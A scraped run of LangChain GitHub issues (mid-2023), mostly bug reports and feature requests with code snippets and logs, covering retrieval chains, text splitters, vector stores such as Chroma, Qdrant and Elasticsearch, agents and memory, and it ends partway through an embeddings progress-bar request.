llama_model_load_internal: total VRAM used: 11314 MB
....................................................................................................
llama_init_from_file: kv self size = 3200.00 MB
AVX = 1 | AVX2 = 1 | AVX512 = 0 | AVX512_VBMI = 0 | AVX512_VNNI = 0 | FMA = 1 | NEON = 0 | ARM_FMA = 0 | F16C = 1 | FP16_VA = 0 | WASM_SIMD = 0 | BLAS = 1 | SSE3 = 1 | VSX = 0 |
Enter your question: Should Hamlet end his life?
[chain/start] [1:chain:ConversationalRetrievalChain] Entering Chain run with input:
{
"question": "Should Hamlet end his life?",
"chat_history": []
}
[chain/start] [1:chain:ConversationalRetrievalChain > 3:chain:StuffDocumentsChain] Entering Chain run with input:
[inputs]
[chain/start] [1:chain:ConversationalRetrievalChain > 3:chain:StuffDocumentsChain > 4:chain:LLMChain] Entering Chain run with input:
{
"question": "Should Hamlet end his life?",
"context": "Enter Hamlet.\n\nEnter Hamlet.\n\nEnter Hamlet.\n\nHaply the seas, and countries different,\n With variable objects, shall expel\n This something-settled matter in his heart,\n Whereon his brains still beating puts him thus\n From fashion of himself. What think you on't?\n Pol. It shall do well. But yet do I believe\n The origin and commencement of his grief\n Sprung from neglected love.- How now, Ophelia?\n You need not tell us what Lord Hamlet said.\n We heard it all.- My lord, do as you please;"
}
[llm/start] [1:chain:ConversationalRetrievalChain > 3:chain:StuffDocumentsChain > 4:chain:LLMChain > 5:llm:LlamaCpp] Entering LLM run with input:
{
"prompts": [
"Use the following pieces of context to answer the question at the end. If you don't know the answer, just say that you don't know, don't try to make up an answer.\n\nEnter Hamlet.\n\nEnter Hamlet.\n\nEnter Hamlet.\n\nHaply the seas, and countries different,\n With variable objects, shall expel\n This something-settled matter in his heart,\n Whereon his brains still beating puts him thus\n From fashion of himself. What think you on't?\n Pol. It shall do well. But yet do I believe\n The origin and commencement of his grief\n Sprung from neglected love.- How now, Ophelia?\n You need not tell us what Lord Hamlet said.\n We heard it all.- My lord, do as you please;\n\nQuestion: Should Hamlet end his life?\nHelpful Answer:"
]
}
llama_print_timings: load time = 1100.49 ms
llama_print_timings: sample time = 13.20 ms / 17 runs ( 0.78 ms per token)
llama_print_timings: prompt eval time = 1100.33 ms / 208 tokens ( 5.29 ms per token)
llama_print_timings: eval time = 1097.70 ms / 16 runs ( 68.61 ms per token)
llama_print_timings: total time = 2270.30 ms
[llm/end] [1:chain:ConversationalRetrievalChain > 3:chain:StuffDocumentsChain > 4:chain:LLMChain > 5:llm:LlamaCpp] [2.27s] Exiting LLM run with output:
{
"generations": [
[
{
"text": " I'm sorry, I don't know the answer to that question.",
"generation_info": null
}
]
],
"llm_output": null,
"run": null
}
[chain/end] [1:chain:ConversationalRetrievalChain > 3:chain:StuffDocumentsChain > 4:chain:LLMChain] [2.27s] Exiting Chain run with output:
{
"text": " I'm sorry, I don't know the answer to that question."
}
[chain/end] [1:chain:ConversationalRetrievalChain > 3:chain:StuffDocumentsChain] [2.27s] Exiting Chain run with output:
{
"output_text": " I'm sorry, I don't know the answer to that question."
}
[chain/end] [1:chain:ConversationalRetrievalChain] [5.41s] Exiting Chain run with output:
{
"answer": " I'm sorry, I don't know the answer to that question."
}
> Answer: I'm sorry, I don't know the answer to that question.
```
### Expected behavior
I expect the `on_retriever_end()` callback to be called immediately after documents are retrieved. I'm not sure what I'm doing wrong. | on_retriever_end() not called with ConversationalRetrievalChain | https://api.github.com/repos/langchain-ai/langchain/issues/7290/comments | 12 | 2023-07-06T16:51:42Z | 2024-04-25T16:11:49Z | https://github.com/langchain-ai/langchain/issues/7290 | 1,791,902,494 | 7,290 |
[
"langchain-ai",
"langchain"
] | ### System Info
Mac OS Ventura 13.3.1 (a)
Python 3.10.8
LangChain 0.0.224
### Who can help?
@hwchase17
@hinthornw
### Information
- [ ] The official example notebooks/scripts
- [x] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Reproduction Steps:
1. Run the following
```
from langchain.llms import OpenAI
from langchain.indexes import GraphIndexCreator
from langchain.chains import GraphQAChain
from langchain.prompts import PromptTemplate
text = "Apple announced the Vision Pro in 2023."
index_creator = GraphIndexCreator(llm=OpenAI(openai_api_key='{OPEN_AI_KEY_HERE}', temperature=0))
graph = index_creator.from_text(text)
chain = GraphQAChain.from_llm(
OpenAI(temperature=0, openai_api_key='{OPEN_AI_KEY_HERE}'),
graph=graph,
verbose=True
)
chain.run("When did Apple announce the Vision Pro?")
```
2. Observe the "Full Context" output in your terminal and notice that the two triplets are concatenated onto a single line with no spacing in between them.
I believe the issue is in the code [here](https://github.com/hwchase17/langchain/blob/681f2678a357268c435c18f19323ccb50cac079c/langchain/chains/graph_qa/base.py#L80). When only 1 triplet is found in an iteration, `.join` does not add any `\n` characters, resulting in a context string with no separation between triplets.
### Expected behavior
Expected: A multi-line string with each triplet text on its own line (delimited by `"\n"`)
In the above repro steps, I would expect
```
Full Context:
Apple announced Vision Pro
Vision Pro was announced in 2023
``` | Input in GraphQAChain Prompt is Malformed When Only 1 Triplet Is Found | https://api.github.com/repos/langchain-ai/langchain/issues/7289/comments | 2 | 2023-07-06T16:25:05Z | 2023-07-07T21:19:54Z | https://github.com/langchain-ai/langchain/issues/7289 | 1,791,868,997 | 7,289 |
[
"langchain-ai",
"langchain"
] | ### Issue with current documentation:
If we run a `Search` on the python.langchain.com/docs/ we got the result as several clickable fields. Those fields are the URLs of the found results. But the fields are too short to show the URLs. We cannot see what LangChain doc pages were found. We see just the start of the URL string, like `1. python.langchain.com/docs/module...` All found fields shows the same above text, which is useless.

### Idea or request for content:
Several ideas on how to fix it:
1. make the result fields longer and place them one after another in the list.
2. show the last part of the URL string not the start of the URL string. | DOC: Search functionality: `Verified Sources:` fields unreadable | https://api.github.com/repos/langchain-ai/langchain/issues/7288/comments | 1 | 2023-07-06T16:17:48Z | 2023-10-05T22:06:37Z | https://github.com/langchain-ai/langchain/issues/7288 | 1,791,859,217 | 7,288 |
[
"langchain-ai",
"langchain"
] | ### System Info
Langchain 0.0.223
Linux
Python 3.11
### Who can help?
@hwchase17
@agola11
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [X] Memory
- [X] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
something like this
```python
chat_history = PostgresChatMessageHistory( # Just a slight mod of the postgres class for sorting the results by date
connection_string=config('SUPABASE_POSTGRES_CONNECT_STRING'),
session_id="58964243-23cd-41fe-ad05-ecbfd2a73202", # str(uuid.uuid4()),
table_name="chat_history"
)
memory = ConversationBufferMemory(
memory_key="chat_history",
chat_memory=chat_history,
return_messages=True,
human_prefix="USER", # This doesn't work.
ai_prefix="ASSISTANT",) # This doesn't work.
agent = ChatAgent(
name="Chat Assistant",
tools=_tools,
agent_type=AgentType.OPENAI_MULTI_FUNCTIONS,
llm=openai
)
```
If I look at what was prompted and in postgres, it always shows "Human" and "AI"
### Expected behavior
I expect USER and ASSISTANT to be used everywhere after I set it. I see this as especially important when using openai's chat endpoint since their models were trained using these tokens.
I also think it would be better to load the memory/chat history as the openai API provides parameters for (As a list of messages) instead of in the SYSTEM message, but perhaps that's for another issue. | Can't use human_prefix and ai_prefix with agent | https://api.github.com/repos/langchain-ai/langchain/issues/7285/comments | 3 | 2023-07-06T15:57:25Z | 2024-04-01T11:21:35Z | https://github.com/langchain-ai/langchain/issues/7285 | 1,791,828,808 | 7,285 |
[
"langchain-ai",
"langchain"
] | ### System Info
When I initialise ChatAnthropic(), it got the error:
anthropic_version = packaging.version.parse(version("anthropic"))
AttributeError: module 'packaging' has no attribute 'version'
### Who can help?
@hwchase17 @agola11
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
from langchain.chat_models import ChatOpenAI, ChatAnthropic
llm = ChatAnthropic()
### Expected behavior
As shown above. | anthropic_version = packaging.version.parse(version("anthropic")) AttributeError: module 'packaging' has no attribute 'version' | https://api.github.com/repos/langchain-ai/langchain/issues/7283/comments | 5 | 2023-07-06T15:35:39Z | 2023-10-14T20:10:57Z | https://github.com/langchain-ai/langchain/issues/7283 | 1,791,794,342 | 7,283 |
[
"langchain-ai",
"langchain"
] | ### System Info
Getting ''' ValueError: Unable to send PDF to Mathpix''' while using MathpixPDFLoader.
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [X] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
math_pix_loaded = MathpixPDFLoader(file_path)
load_list_mathpix = math_pix_loaded.load()
### Expected behavior
A list of pages to be returned. | MathpixPDFLoader doesn't work. | https://api.github.com/repos/langchain-ai/langchain/issues/7282/comments | 5 | 2023-07-06T15:15:17Z | 2023-10-07T17:05:46Z | https://github.com/langchain-ai/langchain/issues/7282 | 1,791,761,739 | 7,282 |
[
"langchain-ai",
"langchain"
] | ### Feature request
It would be nice to have a similar function as `get_openai_callback()` for VertexAI. This actually gives the input tokens, output tokens and cost of using OpenAI models:
```python
with get_openai_callback() as cb:
llm = OpenAI(temperature=0)
chat = ChatOpenAI(temperature=0)
emb = OpenAIEmbeddings()
output_llm = llm("As I was saying,")
print(output_llm)
# System message + Human Message
messages = [
SystemMessage(content="You are a helpful assistant that translates English to French."),
HumanMessage(content="Translate this sentence from English to French. I love programming.")
]
output_chat = chat(messages)
print(output_chat)
print(cb)
```
I would like to have:
```python
with get_vertexai_callback() as cb:
llm = VertexAI(temperature=0)
chat = ChatVertexAI(temperature=0)
emb = VertexAIEmbeddings()
print(llm("As I was saying,"))
# System message + Human Message
messages = [
SystemMessage(content="You are a helpful assistant that translates English to French."),
HumanMessage(content="Translate this sentence from English to French. I love programming.")
]
print(chat(messages))
```
### Motivation
I would like to monitor my usage of VertexAI models
### Your contribution
I already read quite a bit the openai version of the callback but if anyone has already thought about how to do it with vertex I would be really curious :). If someone else also planned to do it we could merge efforts! | Callback for VertexAI to monitor cost and token consumption | https://api.github.com/repos/langchain-ai/langchain/issues/7280/comments | 8 | 2023-07-06T14:50:29Z | 2024-06-05T10:48:30Z | https://github.com/langchain-ai/langchain/issues/7280 | 1,791,718,932 | 7,280 |
[
"langchain-ai",
"langchain"
] | You can pass filter to an kNN in elasticsearch.
This is currently implemented in the langchain wrapper in the exact KNN search.
But is not yet implemented in the approximate KNN search.
Add filter param to [_default_knn_query](https://github.com/jeffvestal/langchain/blob/10f34bf62e2d53f0b1a7b15ba21c2328b64862cd/langchain/vectorstores/elastic_vector_search.py#L398), [knn_search](https://github.com/jeffvestal/langchain/blob/10f34bf62e2d53f0b1a7b15ba21c2328b64862cd/langchain/vectorstores/elastic_vector_search.py#L432), [knn_hybrid_search](https://github.com/jeffvestal/langchain/blob/10f34bf62e2d53f0b1a7b15ba21c2328b64862cd/langchain/vectorstores/elastic_vector_search.py#L488).
cc: @jeffvestal, @derickson
### Suggestion:
_No response_ | Allow filter to be passed in ElasticKnnSearch knn_search and knn_hybrid_search | https://api.github.com/repos/langchain-ai/langchain/issues/7277/comments | 1 | 2023-07-06T13:56:39Z | 2023-09-20T14:35:44Z | https://github.com/langchain-ai/langchain/issues/7277 | 1,791,621,321 | 7,277 |
[
"langchain-ai",
"langchain"
] | ### Feature request
This adds support for Apache SOLRs vector search capabilities
(https://solr.apache.org/guide/solr/latest/query-guide/dense-vector-search.html)
### Motivation
As SOLR is a commonly used search index and now offers this feature, it is important to allow SOLR users to be able to integrate seamlessly with LangChain (and the associated benefits).
### Your contribution
I can try submitting a PR | [FEATURE] SOLR Based Vector Store | https://api.github.com/repos/langchain-ai/langchain/issues/7273/comments | 8 | 2023-07-06T12:44:39Z | 2024-02-15T16:11:20Z | https://github.com/langchain-ai/langchain/issues/7273 | 1,791,490,032 | 7,273 |
[
"langchain-ai",
"langchain"
] | ### Issue you'd like to raise.
```
def handle_embeddings(payload):
loader = UnstructuredPDFLoader(payload["filepath"])
documents = loader.load()
text_splitter = SpacyTextSplitter(pipeline=payload["language"], chunk_size=1536, chunk_overlap=0)
docs = text_splitter.split_documents(documents)
embeddings = OpenAIEmbeddings(**payload)
qdrant = Qdrant.from_documents(
docs, embeddings,
path=path,
collection_name=collection_name,
)
import dramatiq
from dramatiq.brokers.redis import RedisBroker
from tasks import handle_embeddings
redis_broker = RedisBroker(url='redis://redis.helloreader.docker/10')
dramatiq.set_broker(redis_broker)
@dramatiq.actor(max_retries = 0)
def handle_embeddings_task(payload):
result = handle_embeddings(payload)
return result
```
Due to the time-consuming nature of embeddings and storing them in a vector database, I opted for asynchronous queue tasks to handle them. However, I noticed that when processing documents of size 30 MB, the memory usage of the queue task kept increasing until it eventually crashed due to overflow. At this point, I investigated and found that the memory overflow occurred even before the embeddings interface was called, indicating that the issue was with the `Qdrant.from_documents` method. I have been searching for the root cause for a while but haven't found it yet.
### Suggestion:
I hope someone who is familiar with the `Qdrant.from_documents` method or has knowledge of other possible causes can help me resolve this issue.
The document size of approximately 30 MB corresponds to approximately 560,000 tokens.
During the process, I tried using Dramatiq, Celery, and RQ, and encountered the same issue with all of them. Therefore, we can exclude the possibility of the issue being specific to these queue tools. | 'Qdrant.from_documents' Memory overflow | https://api.github.com/repos/langchain-ai/langchain/issues/7272/comments | 8 | 2023-07-06T12:25:00Z | 2023-10-16T16:06:24Z | https://github.com/langchain-ai/langchain/issues/7272 | 1,791,458,701 | 7,272 |
[
"langchain-ai",
"langchain"
] | ### Issue you'd like to raise.
I am using Tools and Agents to query on different vectorstores. But when I am asking question which is not from the vectorstore.It responds i dont know. So is there any approach i can try where if the answer is not from the vectorstore i can carry out the conversation like chatgpt. If Yes? Can you Please let me know how we can integrate this
### Suggestion:
_No response_ | Langchain Tools and Agents | https://api.github.com/repos/langchain-ai/langchain/issues/7269/comments | 5 | 2023-07-06T10:11:15Z | 2023-12-01T16:09:13Z | https://github.com/langchain-ai/langchain/issues/7269 | 1,791,243,008 | 7,269 |
[
"langchain-ai",
"langchain"
] | ### System Info
LangChain v0.0.225, Windows10, Python 3.10
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
一个来自langchain的事例代码如下:
from langchain import PromptTemplate, LLMChain
from langchain.llms import GPT4All
from langchain.callbacks.streaming_stdout import StreamingStdOutCallbackHandler
template = """Question: {question}
Answer: Let's think step by step."""
prompt = PromptTemplate(template=template, input_variables=["question"])
local_path = (
"ggml-gpt4all-j-v1.3-groovy.bin" # replace with your desired local file path
)
callbacks = [StreamingStdOutCallbackHandler()]
llm = GPT4All(model=local_path, callbacks=callbacks, verbose=True)
llm_chain = LLMChain(prompt=prompt, llm=llm)
question = "What NFL team won the Super Bowl in the year Justin Bieber was born?"
llm_chain.run(question)
执行的结果如下:
TypeError: GPT4All.generate() got an unexpected keyword argument 'n_ctx'
当我加上参数 max_tokens=200 时:llm = GPT4All(model=local_path, max_tokens=200, callbacks=callbacks, verbose=True)
出现如下结果:
ValidationError: 1 validation error for GPT4All
max_tokens
extra fields not permitted (type=value_error.extra)
### Expected behavior
callbacks = [StreamingStdOutCallbackHandler()]
llm = GPT4All(model=local_path, max_tokens=200, callbacks=callbacks, verbose=True)
llm_chain = LLMChain(prompt=prompt, llm=llm)
question = "What NFL team won the Super Bowl in the year Justin Bieber was born?"
llm_chain.run(question)
#可以输出正确结果 | langchain + gpt4all 执行异常,总提示参数问题 | https://api.github.com/repos/langchain-ai/langchain/issues/7268/comments | 3 | 2023-07-06T09:22:31Z | 2023-10-14T20:11:07Z | https://github.com/langchain-ai/langchain/issues/7268 | 1,791,159,677 | 7,268 |
[
"langchain-ai",
"langchain"
] | ### System Info
LangChain v0.0.225, Windows, Python 3.10
### Who can help?
@hwchase17
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
The behavior for `CharacterTextSplitter` when changing `keep_separator` when using normal characters is like this:
```python
text_splitter = CharacterTextSplitter(
chunk_size=4,
chunk_overlap=0,
separator="_",
keep_separator=False,
)
text_splitter.split_text("foo_bar_baz_123")
# ['foo', 'bar', 'baz', '123']
```
```python
text_splitter = CharacterTextSplitter(
chunk_size=4,
chunk_overlap=0,
separator="_",
keep_separator=True,
)
text_splitter.split_text("foo_bar_baz_123")
# ['foo', '_bar', '_baz', '_123']
```
However, when using special regex characters like `.` or `*` the splitter breaks when `keep_separator` is `False`.
```python
text_splitter = CharacterTextSplitter(
chunk_size=4,
chunk_overlap=0,
separator=r"\.",
keep_separator=False,
)
text_splitter.split_text("foo.bar.baz.123")
# ['foo.bar.baz.123']
```
The special characters should be escaped, otherwise it raises an error. For example, the following code raises an error.
```python
text_splitter = CharacterTextSplitter(
chunk_size=4,
chunk_overlap=0,
separator=r"?",
keep_separator=True,
)
text_splitter.split_text("foo?bar?baz?123")
```
I'll make a PR to fix this.
Also, the documentation never mentions that the separator should be a regex, I only found out the hard way after getting regex errors on one of the `RecursiveTextSplitter` splitters after updating LangChain. I think we should add a note about this in the documentation or the code.
### Expected behavior
```python
text_splitter = CharacterTextSplitter(
chunk_size=4,
chunk_overlap=0,
separator=r"\.",
keep_separator=False,
)
text_splitter.split_text("foo.bar.baz.123")
# ['foo', 'bar', 'baz', '123']
``` | Inconsistent behavior of `CharacterTextSplitter` when changing `keep_separator` for special regex characters | https://api.github.com/repos/langchain-ai/langchain/issues/7262/comments | 1 | 2023-07-06T07:57:36Z | 2023-07-06T13:54:13Z | https://github.com/langchain-ai/langchain/issues/7262 | 1,791,023,162 | 7,262 |
[
"langchain-ai",
"langchain"
] | ### System Info
Error: Please install chromadb as a dependency with, e.g. `npm install -S chromadb`
at Function.imports (file:///home/aqib/backend-11/vision/node_modules/langchain/dist/vectorstores/chroma.js:160:19)
at processTicksAndRejections (node:internal/process/task_queues:96:5)
at async Chroma.ensureCollection (file:///home/aqib/backend-11/vision/node_modules/langchain/dist/vectorstores/chroma.js:61:42)
at async Chroma.addVectors (file:///home/aqib/backend-11/vision/node_modules/langchain/dist/vectorstores/chroma.js:88:28)
at async Chroma.addDocuments (file:///home/aqib/backend-11/vision/node_modules/langchain/dist/vectorstores/chroma.js:56:9)
at async Function.fromDocuments (file:///home/aqib/backend-11/vision/node_modules/langchain/dist/vectorstores/chroma.js:145:9)
at async add (file:///home/aqib/backend-11/vision/vectorStore/db.js:24:5)
at async run (file:///home/aqib/backend-11/vision/vectorStore/insertDocs.js:6:3)
node:internal/process/promises:279
triggerUncaughtException(err, true /* fromPromise */);
^
**_Got this when I console Logged the error_**
ReferenceError: fetch is not defined
at Object.<anonymous> (/home/aqib/backend-11/vision/node_modules/chromadb/dist/main/generated/runtime.js:17:24)
at Module._compile (node:internal/modules/cjs/loader:1196:14)
at Object.Module._extensions..js (node:internal/modules/cjs/loader:1250:10)
at Module.load (node:internal/modules/cjs/loader:1074:32)
at Function.Module._load (node:internal/modules/cjs/loader:909:12)
at Module.require (node:internal/modules/cjs/loader:1098:19)
at require (node:internal/modules/cjs/helpers:108:18)
at Object.<anonymous> (/home/aqib/backend-11/vision/node_modules/chromadb/dist/main/generated/api.js:17:19)
at Module._compile (node:internal/modules/cjs/loader:1196:14)
at Object.Module._extensions..js (node:internal/modules/cjs/loader:1250:10)
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Call any Chroma method to reproduce this issue
### Expected behavior
It should've inserted the documents | Chroma DB Error | https://api.github.com/repos/langchain-ai/langchain/issues/7260/comments | 11 | 2023-07-06T07:46:56Z | 2024-03-13T19:55:57Z | https://github.com/langchain-ai/langchain/issues/7260 | 1,791,006,392 | 7,260 |
[
"langchain-ai",
"langchain"
] | ### Issue you'd like to raise.
I'm using the `OpenAIEmbeddings` object to create embeddings for my list of documents. While it expects a list of strings, the `embed_documents` function seems misleading as to accept a list of documents. As a result, passing a list of documents raises `AttributeError` since `Document` objects do not have a `replace` method.
### Suggestion:
1. Add a `replace` method to `Document` (or)
2. Extend the function `embed_documents` to handle `Document` objects (or)
3. Rename the function to suit handling a list of strings
I will be glad to implement one of them as a first issue! | Issue: confusion about `Document` or string input for `embed_documents` function | https://api.github.com/repos/langchain-ai/langchain/issues/7259/comments | 3 | 2023-07-06T07:32:37Z | 2023-10-05T17:49:36Z | https://github.com/langchain-ai/langchain/issues/7259 | 1,790,985,762 | 7,259 |
[
"langchain-ai",
"langchain"
] | I was using openai functions agent with custom functions , the custom function(loan eligibility) needs three augments , state, age and income .
when i run the agent with question "how much can i borrow in state CA?" , it is directly calling function without asking age and income from the user .
below is the error
pydantic.error_wrappers.ValidationError: 2 validation errors for LoanEligibilitySchema
age
field required (type=value_error.missing)
income
field required (type=value_error.missing)
how to fix this ?
### Suggestion:
_No response_ | OpenAI Functions Agent not asking required parameter value | https://api.github.com/repos/langchain-ai/langchain/issues/7255/comments | 1 | 2023-07-06T06:19:57Z | 2023-10-12T16:06:00Z | https://github.com/langchain-ai/langchain/issues/7255 | 1,790,892,343 | 7,255 |
[
"langchain-ai",
"langchain"
] | ### System Info
LangChain 0.0.225, Python 3.10, Windows
### Who can help?
@hwchase17
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [X] Memory
- [X] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
I am creating a structured chat agent using an `AgentExecutor.from_agent_and_tools`. I have added a custom variable `new_variable` to `input_variables`, and followed the instructions on how to add memory as per here: https://python.langchain.com/docs/modules/agents/agent_types/structured_chat
`def get_agent_executor(llm: ChatOpenAI, tools: list[Tool], chat_history: MessagesPlaceholder, memory: ConversationBufferMemory) -> AgentExecutor:
input_variables = ["input", "agent_scratchpad", "chat_history", "new_variable"]
prefix = CUSTOM_PREFIX
suffix = CUSTOM_SUFFIX
custom_prompt = StructuredChatAgent.create_prompt(tools, prefix=prefix, suffix=suffix,
input_variables=input_variables, memory_prompts=[chat_history])
llm_chain = LLMChain(llm=llm, prompt=custom_prompt, verbose=True)
convo_agent = StructuredChatAgent(llm_chain=llm_chain)
agent_executor = AgentExecutor.from_agent_and_tools(agent=convo_agent, tools=tools, verbose=True, max_iterations=1,
memory=memory, memory_prompts=[chat_history], input_variables=input_variables,
handle_parsing_errors="Check your output and make sure it is a markdown code snippet of a json blob with a single action!")
return agent_executor`
This agent crashes every time at the end of the first iteration:
`final_outputs: Dict[str, Any] = self.prep_outputs(
self.memory.save_context(inputs, outputs)
input_str, output_str = self._get_input_output(inputs, outputs)
prompt_input_key = get_prompt_input_key(inputs, self.memory_variables)
raise ValueError(f"One input key expected got {prompt_input_keys}")
ValueError: One input key expected got ['example_good_page', 'input']`
### Expected behavior
save_context without hiccup | Structured Chat Agent cannot save_context when memory has additional input variables | https://api.github.com/repos/langchain-ai/langchain/issues/7254/comments | 1 | 2023-07-06T04:49:18Z | 2023-10-12T16:06:05Z | https://github.com/langchain-ai/langchain/issues/7254 | 1,790,798,010 | 7,254 |
[
"langchain-ai",
"langchain"
] | null | How to parse docx/pdf file which contains text table and image?Also, we need to classify text table and image, maybe operations are different?thanks | https://api.github.com/repos/langchain-ai/langchain/issues/7252/comments | 2 | 2023-07-06T04:35:02Z | 2023-10-12T16:06:10Z | https://github.com/langchain-ai/langchain/issues/7252 | 1,790,785,354 | 7,252 |
[
"langchain-ai",
"langchain"
] | ### Feature request
how to disable the OpenAI initialization when you're not using an OpenAI model.
[Please check this issue](https://github.com/hwchase17/langchain/issues/7189#issuecomment-1621931461)
### Motivation
I am trying to build a VectorstoreIndexCreator using the following configuration
embeddings= SentenceTransformerEmbeddings embeddings
vectorstore_cls = Chroma
llm = HuggingfaceHub Model
Note: I am not using any openai model as llm or embedding purpose
here is the code
```
from langchain.indexes import VectorstoreIndexCreator
from langchain.vectorstores import Chroma
from langchain.text_splitter import CharacterTextSplitter
from langchain.embeddings import SentenceTransformerEmbeddings
from langchain.llms import HuggingFaceHub
from langchain.document_loaders import PyPDFLoader
loader = PyPDFLoader("pdffile.pdf")
embeddings = SentenceTransformerEmbeddings(model_name="paraphrase-MiniLM-L6-v2")
model = HuggingFaceHub(repo_id="facebook/mbart-large-50",
model_kwargs={"temperature": 0, "max_length":200},
huggingfacehub_api_token=HUGGING_FACE_API_KEY)
index = VectorstoreIndexCreator(
embedding=embeddings,
vectorstore_cls=Chroma,
text_splitter=CharacterTextSplitter(chunk_size=100,chunk_overlap=0)
).from_loaders([loader])
result = index.query(llm=model,question=query,chain_type="refine")
```
But still iam getting the open_ai key dependency error when i run the code
```
Did not find openai_api_key, please add an environment variable `OPENAI_API_KEY` which contains it, or pass `openai_api_key` as a named parameter. (type=value_error)
```
using langchain version: langchain==0.0.219
### Your contribution
To disable the OpenAI initialization when you're not using an OpenAI model | How to disable the OpenAI initialization when you're not using an OpenAI model | https://api.github.com/repos/langchain-ai/langchain/issues/7251/comments | 3 | 2023-07-06T04:19:04Z | 2024-03-02T14:38:20Z | https://github.com/langchain-ai/langchain/issues/7251 | 1,790,771,160 | 7,251 |
[
"langchain-ai",
"langchain"
] | ### System Info
langchain : 0.0.223
os: mac Ventura 13.4.1 max
python: 3.11.3
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
I have compiled the llama.cpp project into mps, and tested the support for gpu acceleration under mps through the command, but when calling the cpp model in langchain, I found, When I set n_gpu_layer to 1, the gpu acceleration of mps is not turned on, below is the code and output by it.
callback_manager = CallbackManager([StreamingStdOutCallbackHandler()])
llm=LlamaCpp(model_path='./zh-models/33B/ggml-model-q4_K.bin', n_ctx="2048", n_gpu_layers=1, callback_manager = callback_manager, verbose = True)
llm('tell me a joke')
`llama_model_load_internal: format = ggjt v3 (latest)
llama_model_load_internal: n_vocab = 49954
llama_model_load_internal: n_ctx = 2048
llama_model_load_internal: n_embd = 6656
llama_model_load_internal: n_mult = 256
llama_model_load_internal: n_head = 52
llama_model_load_internal: n_layer = 60
llama_model_load_internal: n_rot = 128
llama_model_load_internal: ftype = 2 (mostly Q4_0)
llama_model_load_internal: n_ff = 17920
llama_model_load_internal: model size = 30B
llama_model_load_internal: ggml ctx size = 0.14 MB
llama_model_load_internal: mem required = 19884.88 MB (+ 3124.00 MB per state)
llama_new_context_with_model: kv self size = 3120.00 MB
AVX = 0 | AVX2 = 0 | AVX512 = 0 | AVX512_VBMI = 0 | AVX512_VNNI = 0 | FMA = 0 | NEON = 1 | ARM_FMA = 1 | F16C = 0 | FP16_VA = 1 | WASM_SIMD = 0 | BLAS = 1 | SSE3 = 0 | VSX = 0 |
`
### Expected behavior
support mps gpu acceleration | Does LlamaCPP currently not support the gpu acceleration of mps when n_gpu_layer to 1? | https://api.github.com/repos/langchain-ai/langchain/issues/7249/comments | 0 | 2023-07-06T03:50:02Z | 2023-07-06T03:56:20Z | https://github.com/langchain-ai/langchain/issues/7249 | 1,790,747,965 | 7,249 |
[
"langchain-ai",
"langchain"
] | ### Feature request
Add `show_progress_bar` within `OpenAIEmbeddings` class.
### Motivation
Simply speaking,
1. Showing progress bar within existing progress bar is generally not a good practice. Most of time it will break.
